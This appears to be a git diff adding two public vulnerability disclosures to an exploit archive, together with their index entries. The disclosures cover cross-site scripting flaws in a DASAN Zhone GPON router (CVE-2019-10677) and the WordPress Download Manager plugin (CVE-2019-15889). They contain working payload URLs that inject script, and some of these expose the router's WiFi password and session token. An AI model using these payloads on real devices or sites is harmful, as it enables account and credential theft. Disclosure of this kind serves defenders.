diff --git a/exploits/hardware/webapps/47351.txt b/exploits/hardware/webapps/47351.txt new file mode 100644 index 000000000..5b93d4dfc --- /dev/null +++ b/exploits/hardware/webapps/47351.txt @@ -0,0 +1,40 @@ +Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters. + +# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU + +# Date: 31.03.2019 + +# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl + +# Vendor Homepage: https://dasanzhone.com + +# Version: <= S3.1.285 + +# Alternate Version: <= S3.0.738 + +# Tested on: version S3.1.285 (alternate version S3.0.738) + +# CVE : CVE-2019-10677 + + += Reflected Cross-Site Scripting (XSS) = + +http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp + + += Stored Cross-Site Scripting (XSS) = + +* WiFi network plaintext password + +http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);// + +http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);// + +* CSRF token + +http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);// + + += Clickjacking = + + \ No newline at end of file diff --git a/exploits/php/webapps/47350.txt b/exploits/php/webapps/47350.txt new file mode 100644 index 000000000..b8a90333b --- /dev/null +++ b/exploits/php/webapps/47350.txt @@ -0,0 +1,47 @@ +* Exploit Title: WordPress Download Manager Cross-site Scripting +* Discovery Date: 2019-04-13 +* Exploit Author: ThuraMoeMyint +* Author Link: https://twitter.com/mgthuramoemyint +* Vendor Homepage: https://www.wpdownloadmanager.com +* Software Link: https://wordpress.org/plugins/download-manager +* Version: 2.9.93 +* Category: WebApps, WordPress +CVE:CVE-2019-15889 +Description +-- + +In the pro features of the WordPress download manager plugin, there is +a Category Short-code feature witch can use to sort categories with +order by a function which will be used as ?orderby=title,publish_date +. +By adding parameter "> and add any XSS payload , the xss payload will execute. + +To reproduce, + +1.Go to the link where we can find ?orderby +2.Add parameters >” and give simple payload like +3.The payload will execute. +-- + +PoC +-- + +
&order=asc">Asc&order=desc">Desc
+ +-- +Demo +-- +https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc +-- + + +Another reflected cross-site scripting via advance search + +https://server/wpdmpro/advanced-search/ + +https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 86c580d5c..1784de6ed 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41702,3 +41702,5 @@ id,file,description,date,author,type,platform,port 47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple, 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php, 47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php, +47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80 +47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80